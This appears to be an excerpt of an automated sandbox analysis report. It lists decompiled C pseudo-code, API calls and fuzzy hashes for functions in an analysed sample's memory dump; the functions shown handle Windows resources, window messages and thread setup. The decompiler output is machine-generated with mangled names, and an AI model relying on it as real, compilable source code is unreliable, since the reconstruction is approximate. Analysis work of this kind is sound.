                  0x00419fb7
                  0x00419fb7
                  0x00419faa
                  0x00419fca
                  0x00419fcc
                  0x00419fd2
                  0x00419fd4
                  0x00419fd6
                  0x00419feb
                  0x00419ffb
                  0x00419ffb
                  0x0041a000
                  0x0041a007
                  0x0041a009
                  0x00419f7e
                  0x00419f5d
                  0x00419f5d
                  0x00419f5d
                  0x00419f5d
                  0x0041a00c

                  APIs
                  • FindResourceW.KERNEL32(?,004067C9,000000F1), ref: 00419F53
                  • LoadResource.KERNEL32(?,00000000,?,00000080,00000080,?,00406964,004067C9,?,?,004067C9,00000080,?,?,?,0000E800), ref: 00419F66
                  • LockResource.KERNEL32(00000000,?,00000080,00000080,?,00406964,004067C9,?,?,004067C9,00000080,?,?,?,0000E800), ref: 00419F74
                  • FreeResource.KERNEL32(004067C9,00000000,?,?,?,?,00000080,00000080,?,00406964,004067C9,?,?,004067C9,00000080), ref: 0041A000
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 8b073e9d9c4effdb3cbde12bbbdb45fa544cfedb4d8f83069b9da15b990b3ad1
                  • Instruction ID: 52d7cf97b8e89df7df94016f1be127c4d0e1ddb89b48b4ccf54d5b2c19ecb51e
                  • Opcode Fuzzy Hash: 8b073e9d9c4effdb3cbde12bbbdb45fa544cfedb4d8f83069b9da15b990b3ad1
                  • Instruction Fuzzy Hash: 3F213372100210BBDB189FB5CC958FBF7A8EF89714700842EF946D7291EB39DD82D268
                  Uniqueness

                  Uniqueness Score: 0.08%

                  Function 004133B9, Relevance: 6.1, APIs: 4, Instructions: 75windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E004133B9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t44;
				void* _t52;
				void* _t60;
				void* _t72;
				intOrPtr* _t73;
				void* _t74;
				void* _t75;

				_push(8);
				E0042922B(E00438C8C, __ebx, __edi, __esi);
				_t72 = __ecx;
				_t55 = 0;
				_t70 = 1;
				 *((intOrPtr*)(_t75 - 0x14)) = 0;
				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000;
					if(__eflags == 0) {
						goto L10;
					} else {
						__eflags =  *(__ecx + 0x20);
						if(__eflags == 0) {
							goto L10;
						} else {
							E00404820(_t75 - 0x10);
							 *(_t75 - 4) = 1;
							_t70 = 0x104;
							_t55 = E00405860(_t75 - 0x10, __eflags, 0x104);
							_t44 = SendMessageW( *(E0040E20E(_t55, _t75 - 0x10, GetParent( *(_t72 + 0x20))) + 0x20), 0x464, 0x104, _t55);
							_t60 = _t75 - 0x10;
							__eflags = _t44;
							if(__eflags >= 0) {
								goto L5;
							} else {
								E004057B0(_t55, _t60, 0x104, _t72, __eflags);
								 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t75 - 0x10)) + 0xfffffff0;
								E004055F0( *((intOrPtr*)(_t75 - 0x10)) + 0xfffffff0);
								goto L10;
							}
						}
					}
				} else {
					_t78 =  *(__ecx + 0x20);
					if( *(__ecx + 0x20) == 0) {
						L10:
						_push( *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x74)) + 0x24)));
						E00410F00(_t55,  *((intOrPtr*)(_t75 + 8)), _t70, _t72, __eflags);
					} else {
						_t73 =  *((intOrPtr*)(__ecx + 0x80));
						_t52 =  *((intOrPtr*)( *_t73 + 0x40))(_t73, _t75 - 0x14);
						_push( *((intOrPtr*)(_t75 - 0x14)));
						_t74 = _t52;
						E00410F00(0, _t75 - 0x10, 1, _t74, _t78);
						_t79 = _t74;
						 *(_t75 - 4) = 0;
						if(_t74 >= 0) {
							__imp__CoTaskMemFree( *((intOrPtr*)(_t75 - 0x14)));
						}
						_t60 = _t75 - 0x10;
						L5:
						E0040E100(_t55, _t60, _t70, 0xffffffff);
						E00405590( *((intOrPtr*)(_t75 + 8)), _t79, _t75 - 0x10);
						E004055F0( *((intOrPtr*)(_t75 - 0x10)) + 0xfffffff0);
					}
				}
				return E00429303( *((intOrPtr*)(_t75 + 8)));
			}










                  0x004133b9
                  0x004133c0
                  0x004133c5
                  0x004133c9
                  0x004133cb
                  0x004133cc
                  0x004133d2
                  0x00413430
                  0x00413437
                  0x00000000
                  0x00413439
                  0x00413439
                  0x0041343c
                  0x00000000
                  0x0041343e
                  0x00413441
                  0x00413446
                  0x00413449
                  0x0041345a
                  0x00413472
                  0x00413478
                  0x0041347b
                  0x0041347d
                  0x00000000
                  0x0041347f
                  0x0041347f
                  0x00413487
                  0x0041348b
                  0x0041348e
                  0x00000000
                  0x0041348e
                  0x0041347d
                  0x0041343c
                  0x004133d4
                  0x004133d4
                  0x004133d7
                  0x00413493
                  0x00413496
                  0x0041349c
                  0x004133dd
                  0x004133dd
                  0x004133ea
                  0x004133ed
                  0x004133f3
                  0x004133f5
                  0x004133fa
                  0x004133fc
                  0x004133ff
                  0x00413404
                  0x00413404
                  0x0041340a
                  0x0041340d
                  0x0041340f
                  0x0041341b
                  0x00413426
                  0x00413426
                  0x004133d7
                  0x004134a9

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004133C0
                  • CoTaskMemFree.OLE32(00000000), ref: 00413404
                  • GetParent.USER32(?), ref: 0041345C
                  • SendMessageW.USER32(?,00000464,00000104,00000000), ref: 00413472
                    • Part of subcall function 00410F00: __EH_prolog3.LIBCMT ref: 00410F07
                    • Part of subcall function 00410F00: _DebugHeapAllocator.LIBCPMTD ref: 00410F35
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: H_prolog3$AllocatorDebugFreeHeapMessageParentSendTask
                  • String ID:
                  • API String ID: 2013911899-0
                  • Opcode ID: aa1d76451e07afb27f1fcca594dfe4670d68b73288d1ec429b2d6829940d5632
                  • Instruction ID: b402bb67a476cedb4912565f3dba8c2b333015f97909ad526046621802fc7ffc
                  • Opcode Fuzzy Hash: aa1d76451e07afb27f1fcca594dfe4670d68b73288d1ec429b2d6829940d5632
                  • Instruction Fuzzy Hash: B721B1719006199BCF11EFA1CC899AFB7B5FF04318B040A2EF562672E1DB389940CB19
                  Uniqueness

                  Uniqueness Score: 4.31%

                  Function 0041A75B, Relevance: 6.1, APIs: 4, Instructions: 74windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0041A75B(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				struct HDC__* _v44;
				char _v52;
				struct tagTEXTMETRICW _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				int _t36;
				intOrPtr _t41;
				void* _t45;
				void* _t46;
				intOrPtr* _t47;
				intOrPtr* _t61;
				intOrPtr _t62;

				_t61 = __ecx;
				_push(0);
				E004146FE(_t45,  &_v52, 0, __ecx, __eflags);
				_t26 = SendMessageW( *(_t61 + 0x20), 0x31, 0, 0);
				_t46 = 0;
				if(_t26 != 0) {
					_t46 = E0041A6C9( &_v52, _t26);
				}
				GetTextMetricsW(_v44,  &_v112);
				_t65 = _t46;
				if(_t46 != 0) {
					E0041A6C9( &_v52, _t46);
				}
				E00414752(_t46,  &_v52, 0, _t61, _t65);
				SetRectEmpty( &_v32);
				 *((intOrPtr*)( *_t61 + 0x148))( &_v32, _a12);
				 *((intOrPtr*)( *_t61 + 0x118))(0x407, 0,  &_v16);
				_t47 = _a4;
				 *_t47 = 0x7fff;
				_t36 = GetSystemMetrics(6);
				_t62 =  *((intOrPtr*)(_t61 + 0x98));
				_t41 = _t36 + _v12 + _t36 + _v12 - _v32.bottom - _v32.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
				 *((intOrPtr*)(_t47 + 4)) = _t41;
				if(_t41 < _t62) {
					 *((intOrPtr*)(_t47 + 4)) = _t62;
				}
				return _t47;
			}





















                  0x0041a766
                  0x0041a76a
                  0x0041a76e
                  0x0041a77a
                  0x0041a780
                  0x0041a784
                  0x0041a78f
                  0x0041a78f
                  0x0041a798
                  0x0041a79e
                  0x0041a7a0
                  0x0041a7a6
                  0x0041a7a6
                  0x0041a7ae
                  0x0041a7b7
                  0x0041a7c8
                  0x0041a7dc
                  0x0041a7e5
                  0x0041a7ed
                  0x0041a7f3
                  0x0041a7ff
                  0x0041a80c
                  0x0041a812
                  0x0041a815
                  0x0041a817
                  0x0041a817
                  0x0041a820

                  APIs
                    • Part of subcall function 004146FE: __EH_prolog3.LIBCMT ref: 00414705
                    • Part of subcall function 004146FE: GetDC.USER32(00000000), ref: 00414731
                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041A77A
                  • GetTextMetricsW.GDI32(?,?), ref: 0041A798
                  • SetRectEmpty.USER32(?), ref: 0041A7B7
                  • GetSystemMetrics.USER32(00000006), ref: 0041A7F3
                    • Part of subcall function 0041A6C9: SelectObject.GDI32(?,00000000), ref: 0041A6DB
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Metrics$EmptyH_prolog3MessageObjectRectSelectSendSystemText
                  • String ID:
                  • API String ID: 2929776503-0
                  • Opcode ID: 781ed61d3ec97589983eee677279c4574a08405b0067c3e14e8f66cad05ffad0
                  • Instruction ID: 5e72d1f020569593b846c5b2d7e7d932fff3eb78f354e40c28e3565b10d8ae56
                  • Opcode Fuzzy Hash: 781ed61d3ec97589983eee677279c4574a08405b0067c3e14e8f66cad05ffad0
                  • Instruction Fuzzy Hash: C021B032A00218AFCB10DFA4DC88DEEBBB9FF84704F04442AF556A7295DB74A951CB64
                  Uniqueness

                  Uniqueness Score: 2.84%

                  Function 0042445D, Relevance: 6.1, APIs: 4, Instructions: 66windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E0042445D(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebp;
				void* _t15;
				intOrPtr _t18;
				void* _t22;
				void* _t30;
				void* _t31;
				void* _t39;
				intOrPtr _t43;

				_t39 = __edi;
				_t30 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t43 = __ecx;
				_v12 = __ecx;
				_t15 = E0040E168(__ebx, __ecx, __edi, __eflags);
				if(_t15 != 0) {
					if((E00411D59(_t43) & 0x00000100) != 0) {
						_t35 = _t43;
						_t18 = E0040F8F7(_t43, __edi);
						_v8 = _t18;
						if(_t18 == 0) {
							E00413DD0(_t35);
						}
						_push(_t30);
						_push(_t39);
						_t31 = E0040E20E(_t30, _t35, GetForegroundWindow());
						if(_v8 == _t31 || E0040E20E(_t31, _t35, GetLastActivePopup( *(_v8 + 0x20))) == _t31 && SendMessageW( *(_t31 + 0x20), 0x36d, 0x40, 0) != 0) {
							_t22 = 1;
							__eflags = 1;
						} else {
							_t22 = 0;
						}
						SendMessageW( *(_v12 + 0x20), 0x36d, 4 + (0 | _t22 == 0x00000000) * 4, 0);
					}
					_t15 = 1;
				}
				return _t15;
			}













                  0x0042445d
                  0x0042445d
                  0x00424462
                  0x00424463
                  0x00424465
                  0x00424467
                  0x0042446a
                  0x00424471
                  0x00424483
                  0x00424485
                  0x00424487
                  0x0042448c
                  0x00424491
                  0x00424493
                  0x00424493
                  0x00424498
                  0x00424499
                  0x004244ac
                  0x004244b6
                  0x004244e2
                  0x004244e2
                  0x004244dc
                  0x004244dc
                  0x004244dc
                  0x004244fb
                  0x004244fe
                  0x00424501
                  0x00424501
                  0x00424504

                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetForegroundWindow.USER32 ref: 0042449A
                  • GetLastActivePopup.USER32(?), ref: 004244BE
                  • SendMessageW.USER32(?,0000036D,00000040,00000000), ref: 004244D6
                  • SendMessageW.USER32(?,0000036D,00000000,00000000), ref: 004244FB
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSendWindow$ActiveException@8ForegroundLastLongPopupThrow
                  • String ID:
                  • API String ID: 1483153143-0
                  • Opcode ID: 5e01d0021b80f94b93ca2f12c928b94d4bf44d1a51061eb6322084ec4bbdfb35
                  • Instruction ID: 311c84b363ee9cd195a4f0d91d0eb0455680edf92a592f17a1536e3eb6bcd9a6
                  • Opcode Fuzzy Hash: 5e01d0021b80f94b93ca2f12c928b94d4bf44d1a51061eb6322084ec4bbdfb35
                  • Instruction Fuzzy Hash: F6110A72B10220ABDB20BBA6AD45F6F366CDB84344F01007FBA01D71A1E678DE00C66D
                  Uniqueness

                  Uniqueness Score: 1.91%

                  Function 0041E9A2, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E0041E9A2(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				void* _t29;
				void* _t31;
				struct HINSTANCE__* _t33;
				signed int _t35;
				signed int _t36;
				void* _t38;
				signed int* _t41;

				_push(__ecx);
				_push(_t29);
				_t38 = __ecx;
				_t43 =  *((intOrPtr*)(__ecx + 0x58));
				_t41 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t33 =  *(E0042083D(_t29, __ecx, _t41, _t43) + 0xc);
					_v8 = LoadResource(_t33, FindResourceW(_t33,  *(_t38 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t41 = LockResource(_v8);
				}
				_t31 = 1;
				if(_t41 != 0) {
					_t36 =  *_t41;
					if(_t41[0] != 0xffff) {
						_t24 = _t41[2] & 0x0000ffff;
						_t35 = _t41[3] & 0x0000ffff;
					} else {
						_t36 = _t41[3];
						_t24 = _t41[4] & 0x0000ffff;
						_t35 = _t41[5] & 0x0000ffff;
					}
					if((_t36 & 0x00001801) != 0 || _t24 != 0 || _t35 != 0) {
						_t31 = 0;
					}
				}
				if( *(_t38 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t31;
			}
















                  0x0041e9a7
                  0x0041e9a8
                  0x0041e9ab
                  0x0041e9ad
                  0x0041e9b4
                  0x0041e9b7
                  0x0041e9ba
                  0x0041e9c1
                  0x0041e9d8
                  0x0041e9d8
                  0x0041e9df
                  0x0041e9ea
                  0x0041e9ea
                  0x0041e9ee
                  0x0041e9f1
                  0x0041e9f3
                  0x0041e9fe
                  0x0041ea0d
                  0x0041ea11
                  0x0041ea00
                  0x0041ea00
                  0x0041ea03
                  0x0041ea07
                  0x0041ea07
                  0x0041ea1b
                  0x0041ea27
                  0x0041ea27
                  0x0041ea1b
                  0x0041ea2d
                  0x0041ea32
                  0x0041ea32
                  0x0041ea3e

                  APIs
                  • FindResourceW.KERNEL32(?,00000000,00000005), ref: 0041E9CA
                  • LoadResource.KERNEL32(?,00000000), ref: 0041E9D2
                  • LockResource.KERNEL32(00000000), ref: 0041E9E4
                  • FreeResource.KERNEL32(00000000), ref: 0041EA32
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 299c2116452fd0b37ca2ee2ee887d53da6ad5da2f0d358c592aa7821d71ed19d
                  • Instruction ID: 73f21ec7793714c15391b446980484fc0b858eba64b7cd239c20c80e800d1a50
                  • Opcode Fuzzy Hash: 299c2116452fd0b37ca2ee2ee887d53da6ad5da2f0d358c592aa7821d71ed19d
                  • Instruction Fuzzy Hash: AD11EF39600711EBDB209FA2D848AE7B7B4FF04395F10806AEC8263751E379ED90D7A4
                  Uniqueness

                  Uniqueness Score: 0.08%

                  Function 0041D3DC, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0041D3DC(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t44;
				void* _t46;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;

				_t54 = __eflags;
				_t47 = __ecx;
				_t45 = __ebx;
				_push(4);
				E0042922B(E0043924F, __ebx, __edi, __esi);
				_t52 = __ecx;
				 *((intOrPtr*)(_t53 - 0x10)) = __ecx;
				E0041DA26(__ebx, __ecx, __edi, __ecx, _t54);
				 *((intOrPtr*)(_t53 - 4)) = 0;
				 *_t52 = 0x4401bc;
				_t55 =  *((intOrPtr*)(_t53 + 8));
				if( *((intOrPtr*)(_t53 + 8)) == 0) {
					 *((intOrPtr*)(_t52 + 0x50)) = 0;
				} else {
					_t44 = E0042B22A(__edx,  *((intOrPtr*)(_t53 + 8)));
					_pop(_t47);
					 *((intOrPtr*)(_t52 + 0x50)) = _t44;
				}
				_t46 = E0042083D(_t45, 0, _t52, _t55);
				_t56 = _t46;
				if(_t46 == 0) {
					L4:
					E00413DD0(_t47);
				}
				_t7 = _t46 + 0x74; // 0x74
				_t47 = _t7;
				_t37 = E00417474(_t46, _t7, 0, _t52, _t56);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t52;
				 *((intOrPtr*)(_t52 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t52 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t46 + 4)) = _t52;
				 *((short*)(_t52 + 0x92)) = 0;
				 *((short*)(_t52 + 0x90)) = 0;
				 *((intOrPtr*)(_t52 + 0x44)) = 0;
				 *((intOrPtr*)(_t52 + 0x7c)) = 0;
				 *((intOrPtr*)(_t52 + 0x64)) = 0;
				 *((intOrPtr*)(_t52 + 0x68)) = 0;
				 *((intOrPtr*)(_t52 + 0x54)) = 0;
				 *((intOrPtr*)(_t52 + 0x60)) = 0;
				 *((intOrPtr*)(_t52 + 0x88)) = 0;
				 *((intOrPtr*)(_t52 + 0x58)) = 0;
				 *((intOrPtr*)(_t52 + 0x48)) = 0;
				 *((intOrPtr*)(_t52 + 0x8c)) = 0;
				 *((intOrPtr*)(_t52 + 0x80)) = 0;
				 *((intOrPtr*)(_t52 + 0x84)) = 0;
				 *((intOrPtr*)(_t52 + 0x70)) = 0;
				 *((intOrPtr*)(_t52 + 0x74)) = 0;
				 *((intOrPtr*)(_t52 + 0x94)) = 0;
				 *((intOrPtr*)(_t52 + 0x9c)) = 0;
				 *((intOrPtr*)(_t52 + 0x5c)) = 0;
				 *((intOrPtr*)(_t52 + 0x6c)) = 0;
				 *((intOrPtr*)(_t52 + 0x98)) = 0x200;
				return E00429303(_t52);
			}









                  0x0041d3dc
                  0x0041d3dc
                  0x0041d3dc
                  0x0041d3dc
                  0x0041d3e3
                  0x0041d3e8
                  0x0041d3ea
                  0x0041d3ed
                  0x0041d3f4
                  0x0041d3f7
                  0x0041d3fd
                  0x0041d400
                  0x0041d410
                  0x0041d402
                  0x0041d405
                  0x0041d40a
                  0x0041d40b
                  0x0041d40b
                  0x0041d418
                  0x0041d41a
                  0x0041d41c
                  0x0041d41e
                  0x0041d41e
                  0x0041d41e
                  0x0041d423
                  0x0041d423
                  0x0041d426
                  0x0041d42d
                  0x00000000
                  0x00000000
                  0x0041d42f
                  0x0041d438
                  0x0041d441
                  0x0041d444
                  0x0041d449
                  0x0041d450
                  0x0041d457
                  0x0041d45a
                  0x0041d45d
                  0x0041d460
                  0x0041d463
                  0x0041d466
                  0x0041d469
                  0x0041d46f
                  0x0041d472
                  0x0041d475
                  0x0041d47b
                  0x0041d481
                  0x0041d487
                  0x0041d48a
                  0x0041d48d
                  0x0041d493
                  0x0041d499
                  0x0041d49c
                  0x0041d49f
                  0x0041d4b0

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041D3E3
                    • Part of subcall function 0041DA26: __EH_prolog3.LIBCMT ref: 0041DA2D
                  • __wcsdup.LIBCMT ref: 0041D405
                  • GetCurrentThread.KERNEL32(00000004,00408481,00000000), ref: 0041D432
                  • GetCurrentThreadId.KERNEL32 ref: 0041D43B
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CurrentH_prolog3Thread$__wcsdup
                  • String ID:
                  • API String ID: 190065205-0
                  • Opcode ID: 06e325444c09c92637faf52df9b12301e0e0fae3b302526febd8ccccf688ee8b
                  • Instruction ID: ef881a1b005133299fbae937796e1d6a734a636c9b503de1267f9aef96775d5c
                  • Opcode Fuzzy Hash: 06e325444c09c92637faf52df9b12301e0e0fae3b302526febd8ccccf688ee8b
                  • Instruction Fuzzy Hash: 40219FB0900B50CEC7219F7A944529AFBF8BFA4704F10891FD5AAC7722DBB4A541CF59
                  Uniqueness

                  Uniqueness Score: 5.54%

                  Function 00415241, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00415241(void* __ebx, void* __edi, void* __esi, void* __eflags, long* _a4, intOrPtr _a8, short _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				long* _t20;
				intOrPtr* _t23;
				long _t25;
				intOrPtr _t31;
				long* _t32;
				void* _t42;

				_t42 = __eflags;
				_push(4);
				E0042922B(E004391D6, __ebx, __edi, __esi);
				_t31 = E0040B71F(_t42, 0xc);
				_v16 = _t31;
				_t20 = 0;
				_v4 = 0;
				if(_t31 != 0) {
					_t20 = E00415229(_t31);
				}
				_t32 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t32;
				_a4 = _t20;
				E00428ED5( &_a4, 0x4469c0);
				asm("int3");
				_t23 = _v0;
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				_t25 = FormatMessageW(0x1100, 0,  *(_t32 + 8), 0x800,  &_a12, 0, 0);
				if(_t25 != 0) {
					E0041594E(_a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t25 = 1;
					__eflags = 1;
				} else {
					 *_a4 = _t25;
				}
				return _t25;
			}













                  0x00415241
                  0x00415241
                  0x00415248
                  0x00415255
                  0x00415257
                  0x0041525a
                  0x0041525c
                  0x00415261
                  0x00415263
                  0x00415263
                  0x00415268
                  0x0041526b
                  0x0041526f
                  0x00415272
                  0x0041527e
                  0x00415283
                  0x00415289
                  0x00415290
                  0x00415292
                  0x00415292
                  0x004152a8
                  0x004152b0
                  0x004152c5
                  0x004152d0
                  0x004152d8
                  0x004152d8
                  0x004152b2
                  0x004152b5
                  0x004152b5
                  0x004152da

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00415248
                    • Part of subcall function 0040B71F: _malloc.LIBCMT ref: 0040B73D
                  • __CxxThrowException@8.LIBCMT ref: 0041527E
                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000800,8007000E,00000000,00000000,?,8007000E,004469C0,00000004,00404BDC,8007000E), ref: 004152A8
                  • LocalFree.KERNEL32(8007000E,8007000E), ref: 004152D0
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                  • String ID:
                  • API String ID: 1776251131-0
                  • Opcode ID: 5e6df2becfa6e09828654a8640acb390f50aa6cdf0f6b6a8d0bfdc81a1abea6a
                  • Instruction ID: 02324c6122893bd6bcbeda5571be5b36afebca98924324510bf0fce6ca3f1785
                  • Opcode Fuzzy Hash: 5e6df2becfa6e09828654a8640acb390f50aa6cdf0f6b6a8d0bfdc81a1abea6a
                  • Instruction Fuzzy Hash: DB117071604209EFDB04AFA5DC05AEE3BA5FF88310F24896AF525CB2D0DB758950CB59
                  Uniqueness

                  Uniqueness Score: 1.91%

                  Function 004102B1, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004102B1(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				struct HWND__* _t14;
				intOrPtr* _t19;
				void* _t20;

				_t21 = __ecx;
				_t19 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x128))() != 0) {
					_t21 = __ecx;
					 *((intOrPtr*)( *__ecx + 0x188))();
				}
				SendMessageW( *(_t19 + 0x20), 0x1f, 0, 0);
				E0040ED9C(_t19, _t21,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
				_t22 = _t19;
				_t20 = E0040F8F7(_t19, 0);
				if(_t20 == 0) {
					E00413DD0(_t22);
				}
				SendMessageW( *(_t20 + 0x20), 0x1f, 0, 0);
				E0040ED9C(_t20, _t22,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
				_t14 = GetCapture();
				if(_t14 != 0) {
					return SendMessageW(_t14, 0x1f, 0, 0);
				}
				return _t14;
			}








                  0x004102b1
                  0x004102b5
                  0x004102c2
                  0x004102c6
                  0x004102c8
                  0x004102c8
                  0x004102dd
                  0x004102ea
                  0x004102ef
                  0x004102f6
                  0x004102fa
                  0x004102fc
                  0x004102fc
                  0x00410308
                  0x00410315
                  0x0041031a
                  0x00410322
                  0x00000000
                  0x00410329
                  0x0041032e

                  APIs
                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 004102DD
                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 00410308
                  • GetCapture.USER32 ref: 0041031A
                  • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 00410329
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
